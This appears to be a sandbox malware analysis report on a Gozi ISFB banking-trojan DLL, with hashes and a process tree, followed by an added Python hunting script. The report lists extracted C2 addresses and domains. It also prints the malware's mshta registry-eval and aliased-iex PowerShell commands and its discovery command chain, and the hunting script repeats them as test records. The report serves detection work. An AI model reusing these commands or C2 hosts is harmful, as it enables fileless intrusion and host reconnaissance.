Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220722-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20220722-en locale:en-us os:windows10-2004-x64 system
  • submitted
    09-08-2022 12:29

General

  • Target

    f9d778ad3bfea174401f36a2d88851d8.dll

  • Size

    378KB

  • MD5

    f9d778ad3bfea174401f36a2d88851d8

  • SHA1

    fd2b30e2f029939c31c759d9fbdd5ee5242137c0

  • SHA256

    44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5

  • SHA512

    046ee69e01fc2e64b3cf75ccfa9a0886ef4e6752f9d90e199c67b8cc9cfdf767d8235b3a638fc96782cea0ff1b278f8d36a2ea25c9a5a839c0c03d199de5175a

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com (a legitimate Microsoft host; ISFB builds routinely list one such domain alongside the real C2 servers as a connectivity check, so it is not an indicator on its own and should not be blocked)

79.110.52.8

79.110.52.80

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

79.110.52.82

79.110.52.94

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic signature text calls this likely ransomware behaviour, but nothing else in this run (no file encryption, no ransom note) supports that; for an ISFB loader, drive enumeration fits the host profiling visible in the process tree below.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3520
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:3256
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:4816
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:3784
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Windows\system32\regsvr32.exe
      regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1184
      • C:\Windows\SysWOW64\regsvr32.exe
        /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\system32\control.exe
          C:\Windows\system32\control.exe -h
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4028
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            5⤵
            PID:4244
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp" "c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP"
            5⤵
            PID:3684
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3736
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP"
            5⤵
            PID:4164
    • C:\Windows\system32\cmd.exe
      cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4196
      • C:\Windows\system32\more.com
        more
        3⤵
        PID:3084
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
      2⤵
      PID:3240
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:1224
    • C:\Windows\system32\cmd.exe
      cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2348
      • C:\Windows\system32\systeminfo.exe
        systeminfo.exe
        3⤵
        • Gathers system information
        PID:3636
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:1308
    • C:\Windows\system32\cmd.exe
      cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:1448
      • C:\Windows\system32\net.exe
        net view
        3⤵
        • Discovers systems in the same network
        PID:2136
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:3756
    • C:\Windows\system32\cmd.exe
      cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:3588
      • C:\Windows\system32\nslookup.exe
        nslookup 127.0.0.1
        3⤵
        PID:3116
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:4924
    • C:\Windows\system32\cmd.exe
      cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:396
      • C:\Windows\system32\tasklist.exe
        tasklist.exe /SVC
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1208
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:1272
    • C:\Windows\system32\cmd.exe
      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:5004
      • C:\Windows\system32\driverquery.exe
        driverquery.exe
        3⤵
        PID:1956
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:4560
    • C:\Windows\system32\cmd.exe
      cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:5076
      • C:\Windows\system32\reg.exe
        reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
        3⤵
        PID:3164
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:3428
    • C:\Windows\system32\cmd.exe
      cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:2076
      • C:\Windows\system32\net.exe
        net config workstation
        3⤵
        PID:3636
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 config workstation
          4⤵
          PID:4304
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:3632
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:4992
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts
        3⤵
        PID:3960
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:4552
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:4508
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts /all_trusts
        3⤵
        PID:2812
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:3272
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:1160
      • C:\Windows\system32\net.exe
        net view /all /domain
        3⤵
        • Discovers systems in the same network
        PID:2588
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:856
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
      2⤵
      PID:4352
      • C:\Windows\system32\net.exe
        net view /all
        3⤵
        • Discovers systems in the same network
        PID:4452
  • C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get domain
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4012
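Three things in this tree are worth turning into a hunt: mshta.exe fed an inline about:<hta:application> document that evals script read back out of the registry, PowerShell hiding Invoke-Expression behind a freshly created alias while reading the same HKCU\Software\AppDataLow key, and the injected Explorer.EXE launching a run of discovery tools that all write to one temp file. The script below is an added example, not code from the sandbox or from the sample: it runs those three checks over constructed process-creation records modelled on this tree. The record shape (pid, ppid, image path, command line) is an assumed, simplified projection of a Sysmon Event ID 1 entry, and the BURST_THRESHOLD of five distinct tools into one output file is a chosen tuning value, not something the report states.

```python
"""Hunt for the three ISFB tells in this process tree over process-creation records.

Added example for this page; not code from the sandbox or from the sample.  Each
record is an assumed, simplified projection of a Sysmon Event ID 1 entry:
(pid, ppid, image path, command line).  The sample records are constructed from
the tree above; they are not real telemetry."""
import re
from collections import defaultdict

TMP = r"C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
KEY = r"Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964"
MSHTA_CMD = ('"C:\\Windows\\System32\\mshta.exe" "about:<hta:application><script>'
             "U8sf='wscript.shell';eval(new ActiveXObject(U8sf).regread('HKCU\\\\"
             + KEY + "\\\\LineStop'));close()</script>\"")
PS_CMD = ("powershell.exe new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn "
          '-value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:'
          + KEY + '").MaskStop))')
CMD = r"C:\Windows\system32\cmd.exe"

EVENTS = [  # constructed sample records: (pid, ppid, image, command line)
    (1028, 4, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    (376, 1028, r"C:\Windows\System32\mshta.exe", MSHTA_CMD),
    (1520, 376, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    (4196, 1028, CMD, f'cmd /C "wmic computersystem get domain |more > {TMP}"'),
    (2348, 1028, CMD, f'cmd /C "systeminfo.exe > {TMP}"'),
    (1448, 1028, CMD, f'cmd /C "net view >> {TMP}"'),
    (3588, 1028, CMD, f'cmd /C "nslookup 127.0.0.1 >> {TMP}"'),
    (396, 1028, CMD, f'cmd /C "tasklist.exe /SVC >> {TMP}"'),
    (5004, 1028, CMD, f'cmd /C "driverquery.exe >> {TMP}"'),
    (5076, 1028, CMD, 'cmd /C "reg.exe query "HKLM\\SOFTWARE\\Microsoft\\Windows'
                      f'\\CurrentVersion\\Uninstall" /s >> {TMP}"'),
    (4992, 1028, CMD, f'cmd /C "nltest /domain_trusts >> {TMP}"'),
    # Benign control: a single discovery tool run by hand from the desktop shell.
    (7001, 1028, CMD, r'cmd /C "systeminfo > C:\Users\Admin\Desktop\info.txt"'),
]

RECON = {  # discovery commands ISFB chains into its host profile
    "systeminfo": re.compile(r"\bsysteminfo(\.exe)?\b", re.I),
    "net view": re.compile(r"\bnet(\.exe)?\s+view\b", re.I),
    "nslookup": re.compile(r"\bnslookup(\.exe)?\b", re.I),
    "tasklist /svc": re.compile(r"\btasklist(\.exe)?\s+/svc\b", re.I),
    "driverquery": re.compile(r"\bdriverquery(\.exe)?\b", re.I),
    "reg query uninstall": re.compile(
        r'\breg(\.exe)?\s+query\s+"?hklm\\software\\microsoft\\windows\\currentversion\\uninstall',
        re.I),
    "nltest trusts": re.compile(r"\bnltest(\.exe)?\s+/domain_trusts\b", re.I),
    "wmic domain": re.compile(r"\bwmic(\.exe)?\s+computersystem\s+get\s+domain\b", re.I),
}
REDIRECT = re.compile(r'>>?\s*([^\s"]+)')   # file the tool output is funnelled into
ALIAS_IEX = re.compile(r"new-alias\s+-name\s+\S+\s+-value\s+iex\b", re.I)
BURST_THRESHOLD = 5                           # assumed tuning: distinct tools into one file


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return sorted (rule, pid) findings.  pid is the offending process, or, for the
    recon burst, the parent that launched the chain."""
    image_of = {pid: image for pid, _, image, _ in events}
    findings = set()
    bursts = defaultdict(dict)   # (parent pid, output file) -> {tool: pid}
    for pid, ppid, image, cmd in events:
        exe, low = basename(image), cmd.lower()
        # 1. mshta given an inline HTA that evals script pulled out of the registry.
        if exe == "mshta.exe" and "about:<hta:application>" in low and "regread(" in low:
            findings.add(("mshta_inline_hta_regread", pid))
        # 2. PowerShell hiding iex behind an alias and reading the AppDataLow store.
        if exe == "powershell.exe" and ALIAS_IEX.search(cmd) and "software\\appdatalow" in low:
            findings.add(("powershell_alias_iex_appdatalow", pid))
        # 3. Discovery tools launched by explorer.exe and funnelled into one file.
        if exe == "cmd.exe" and basename(image_of.get(ppid, "")) == "explorer.exe":
            target = REDIRECT.search(cmd)
            for tool, pat in RECON.items():
                if target and pat.search(cmd):
                    bursts[(ppid, target.group(1).lower())][tool] = pid
    for (ppid, _outfile), tools in bursts.items():
        if len(tools) >= BURST_THRESHOLD:
            findings.add(("explorer_recon_burst_to_single_file", ppid))
    return sorted(findings)


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40} pid={pid}")
```

Rules 1 and 2 fire on a single record each and survive the random alias and value names ISFB generates per build, because they key on the about:<hta:application> prefix, the regread call and the iex alias rather than on the names. Rule 3 deliberately needs several distinct tools redirected into the same file from the same explorer.exe parent, so an administrator running systeminfo by hand (the control record) does not trip it; lower BURST_THRESHOLD if your telemetry drops events.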

Network

MITRE ATT&CK Enterprise v6

Downloads

The same path is listed repeatedly because the sandbox captured C:\Users\Admin\AppData\Local\Temp\3BC.bin1 each time one of the discovery commands in the process tree overwrote (>) or appended to (>>) it; the entries are successive snapshots of the collected host profile. The entry whose hashes are those of an empty file (MD5 d41d8cd98f00b204e9800998ecf8427e) is consistent with the systeminfo.exe > redirection truncating the file before any output arrived.

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    Filesize

    44B

    MD5

    f7aea2435aa888b709ca20f816c33bfd

    SHA1

    38717c9a73b5f8bd399839cbe0aa57518427e758

    SHA256

    f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

    SHA512

    1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    Filesize

    2KB

    MD5

    debbdb9be3bb09adf5d355ab9c36187a

    SHA1

    f44a6c37253abc4ad266d46b4b62d50398e0c570

    SHA256

    cf7ef451454095e3ea0011ce0aa85072d81794210f496506388ed080671bf643

    SHA512

    f6c682f54d4b64bbf5554ba9af9a39645de00885a9819eb6a76a61d5539fa888c39602a03cc6ba1bfaa0b30c101b1092217c3e8ef288426f71c3411fa0b68332

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    Filesize

    2KB

    MD5

    d4261765df37d03c995a3f88337551b9

    SHA1

    31303377a5d5808157badd5a7be5c87f673d937a

    SHA256

    26b2ede70ff95672d6c7c3ad8a6140e333ff97d8671c56a4ecbf2527ceec3a08

    SHA512

    4b7fa34739bc78de8a0a5d71ea56a47d34f107ba9dd543e87a0e74c92e0f21b14c06c8c1ed904a693b3e2037a52a87ffa8545adc2b6de5b132f1579bc9e4ad83

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    Filesize

    2KB

    MD5

    f3732be8e8ad283b090cb47ded28b20b

    SHA1

    c880ff4fcfcc3d92ffaaa02cb0c38151661989b8

    SHA256

    b04651609ff611cd455dfa95c12b5e1bfd6b04baa67fdee66547c08b033bb73b

    SHA512

    1eb0395ab8ecfe5e06315d3e71854a6c054821feb36e5d1b431c4ca54e0b07d5ea8ca9b2102d3d627fbdf70691c29cc23e7809acff23d2bcb0e7ad738e40cc5a

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    Filesize

    9KB

    MD5

    eafa11d2f82e86981c80a77d3c8621bc

    SHA1

    c796b1c198d2c0d3acd73215bb3320b8261d660a

    SHA256

    6cb061fa9c465cab49795750b943a79832c1d5dbc685e7ab6e4e6b2d5d6e4880

    SHA512

    d95abdc4cbd9b3c1775bf8eee76651daad15dacbad3888b0a36e54a3a76169dbb624e11bcad43d204ffc650169d657974be12a7bf93fb5dc3dc94e51e2e5c2cf

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    Filesize

    9KB

    MD5

    28cefb694a0586baee4068b1b707ee3f

    SHA1

    5d90d010403e168576e861f9f5dc832649fb1fa5

    SHA256

    dcf901d2adf9af1ae75fabf121e350849d03cb0b2c2aabefdc06f25cb1ba58fc

    SHA512

    ed219a37df106104237d5034e18f5ebb6f4d766df140586848597f7bf773e22dde330f9d9be3a71f3214a143556c9a4e0cf347376979cdbcbece7d3604f7a0ec

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    Filesize

    35KB

    MD5

    91dd82dc33272e52b2b0634128912fc3

    SHA1

    5b31d5b431db80873bc8501ca96401c69da84e76

    SHA256

    533b8a08428ee97abe45244f3133ab3d3c40022ecef388d6aa5cbff79c784c9b

    SHA512

    19c4165763766db298c97c2254e5285560526f2bbb5a21ac84dbdd2fd116b6fdb01de5d447cb34c2a150f14ce8d1a546a317460715dd54a3bc9890a17c374348

  • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

    Filesize

    64KB

    MD5

    bc99dc8482dbf6e658713e410a772962

    SHA1

    5120b2893f19960db065bc2fc777941ad8a7e4f7

    SHA256

    39080d4c825ce4ddc40b2d8266888806572e688728d7bc040408d20a82343d0b

    SHA512

    3bc5ef394d549b2ab0c8c2e1c69d6c10dad924adb98cf67f13463fcd88f48022886c17d601ba839d7c61cfa20ace99bb76f4ef7df07811eb68046ac257ded7f2

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          bc99dc8482dbf6e658713e410a772962

                                                                          SHA1

                                                                          5120b2893f19960db065bc2fc777941ad8a7e4f7

                                                                          SHA256

                                                                          39080d4c825ce4ddc40b2d8266888806572e688728d7bc040408d20a82343d0b

                                                                          SHA512

                                                                          3bc5ef394d549b2ab0c8c2e1c69d6c10dad924adb98cf67f13463fcd88f48022886c17d601ba839d7c61cfa20ace99bb76f4ef7df07811eb68046ac257ded7f2

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          9584e50ab516f8f3d8473f756acf9a7c

                                                                          SHA1

                                                                          f3ef6233adf9681aefbf67c2c83566518c921ee6

                                                                          SHA256

                                                                          287dc1224253a6cb5e5c220f6193da429a37fe93090cf4ecf21591f14cfa9afd

                                                                          SHA512

                                                                          5a0660cd05081cb4023e5f688fe90f61ff8d1a540d5a0e8192b54fb59d299079a2025e0a060be531895a825cb1638508136b4c27372f4ef818db28d79667b1c5

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          9584e50ab516f8f3d8473f756acf9a7c

                                                                          SHA1

                                                                          f3ef6233adf9681aefbf67c2c83566518c921ee6

                                                                          SHA256

                                                                          287dc1224253a6cb5e5c220f6193da429a37fe93090cf4ecf21591f14cfa9afd

                                                                          SHA512

                                                                          5a0660cd05081cb4023e5f688fe90f61ff8d1a540d5a0e8192b54fb59d299079a2025e0a060be531895a825cb1638508136b4c27372f4ef818db28d79667b1c5

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          d8cf63e49c3f22e79e05dde487f6f2f2

                                                                          SHA1

                                                                          7fc8c73ceaf0d108b9d8a2a325ad05ed1413a104

                                                                          SHA256

                                                                          93e3177026041e353d040d414a06570490aea739a2bcb57520532e8f216749c1

                                                                          SHA512

                                                                          f437bc7bf48089acc46f10596adbf069cc12e8ce5ef6d0520f73e5e828a196e0c4a2b087f118b469deb2795c02c55f53c2a54dfcbc2d85a3a803084d41ecacd8

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          6d26aa73f630a7f0276b0cd428f1de06

                                                                          SHA1

                                                                          5a0084e7e4bd9aff05543636ca23bea0bf0dcb2a

                                                                          SHA256

                                                                          6bdcab6cb14d61e0ccc90a59692b1e44ad4c1624b0628318e2410d9333a12203

                                                                          SHA512

                                                                          a3f6d623a0e7ec89416f28277774c35f146102ab443695cb321c0154ca37061333035bb504bda3d786a00c49c0d1aca51f325eb02623304cd0dfcfd4e244282f

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          4746429b9b2c92103225650b6059c26a

                                                                          SHA1

                                                                          df81d1724ecd7f3c09945120dc0022d0f7d4bb23

                                                                          SHA256

                                                                          f59ddebc18b1d25727aa3ab6f4046c987e063917da6fa0d9419397a6243d0db6

                                                                          SHA512

                                                                          17f0128be903af9bed8f96bd4c296690d0ddf63658b50efca0efa7fea0da07db830e7eae5bdc0c3b7f6da7389a5e528a3929110d731d12c290c5da6c1a943e96

                                                                        • C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          01f190bdaec04de221b7e23b41a74673

                                                                          SHA1

                                                                          32023da04ece8010950b5fab4c491904eeadc205

                                                                          SHA256

                                                                          9cdf726460c06e4331b7a20f0dec43563ccad65d5ff051ad22a0abc7c6688758

                                                                          SHA512

                                                                          47d437eeb7252b7d11d15bba087c5b3bcc782115c642f8efc0fc582286c11717046fd96587cb8a704053a7c7ffa6f63aeb67d3283035e94e32671fc6fadf6bb9

                                                                        • C:\Users\Admin\AppData\Local\Temp\RES5087.tmp

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          a59eb24fd5eed325703f8d6222d7629c

                                                                          SHA1

                                                                          01a89b751816810e82f56bc7a5b10e8c32baabf1

                                                                          SHA256

                                                                          5cba1917347a9255c50aa22cf47aaf65a3c9eb544960980f61cacf30c3a5b914

                                                                          SHA512

                                                                          096a523455063b05c49e491d3c065351345a9c7fcd82b42bfc9642ee6206e0a3395ed8fdae8990c0ca046fbe7d8de61db08a835904d24b15a7df05a617aa4725

                                                                        • C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.dll

                                                                          Filesize

                                                                          3KB

                                                                          MD5

                                                                          6ae7ab6abc2bc1ee1a3679f79e3220e0

                                                                          SHA1

                                                                          dd04108b32b3570b14b409f961798359dadae553

                                                                          SHA256

                                                                          5e52468c58b126d14bef7c8d9c611de371ec60caaf61456f334bd5a75173ec5c

                                                                          SHA512

                                                                          7845c853fadea28684338ffe5e2bd5f263030e507faba8dac30176d34eeb01a56e11b7639031c0f31b20d1dd138fa040599b96383eb60e59fa7458b3bddf61c0

                                                                        • C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.dll

                                                                          Filesize

                                                                          3KB

                                                                          MD5

                                                                          92be12bfb85cea8510497b97e1deb99a

                                                                          SHA1

                                                                          2ae7bc20bf614747a77b9aefb76ab15b3fb66e5f

                                                                          SHA256

                                                                          87d6faa6d06cf1ae59c4c5f969aacd6851b256916ac5a086a6f5ea87509e3700

                                                                          SHA512

                                                                          079c54e47708c06ba73e7ada9bc305ff02493b1fdcd0fc614b8acd3b4f9473c90e3d7bbca67be83c668c9e88c87b7aed30e761dfbad835e6d1f810d29bd9d3ad

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP

                                                                          Filesize

                                                                          652B

                                                                          MD5

                                                                          01c7ea8256a930100666ac66c9292ab6

                                                                          SHA1

                                                                          37bf5871ed1239236438b665a914a250f217e32e

                                                                          SHA256

                                                                          78ea4ba18db4484a618b4fc713585d7501d670985caa64d86c5485a2b932ebcb

                                                                          SHA512

                                                                          9f807460bb3b17166e1f6ec2fadbb74daa3b5063e6971383c91c093430e27ea6d723a1c73a345c2576d4ef42c6bc7da72a84083a9675e37507fa3920af2aae97

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.0.cs

                                                                          Filesize

                                                                          400B

                                                                          MD5

                                                                          aca9704199c51fde14b8bf8165bc2a4c

                                                                          SHA1

                                                                          789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                          SHA256

                                                                          cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                          SHA512

                                                                          a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline

                                                                          Filesize

                                                                          369B

                                                                          MD5

                                                                          abe6a4f47746fa860e1827b2c160669a

                                                                          SHA1

                                                                          b4dbfa0ea503c044b4111ab819346464e4f26845

                                                                          SHA256

                                                                          6e99ca8c4c8a091392752e48beb56fe261b7e55e9d51c2904ef221ebf9e038b3

                                                                          SHA512

